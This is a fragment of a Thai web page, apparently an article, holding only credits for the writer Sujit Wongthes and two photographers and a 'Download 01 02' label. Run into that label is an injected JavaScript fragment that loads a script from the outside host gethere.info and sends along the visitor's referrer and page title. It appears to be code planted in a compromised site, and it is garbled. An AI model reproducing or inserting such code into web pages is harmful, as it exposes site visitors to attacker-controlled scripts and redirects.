เรื่องโดย สุจิตต์ วงษ์เทศ

ภาพโดย เจนจิรา เบญจพงศ์ และปติสร เพ็ญสุต

Download 01 02s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;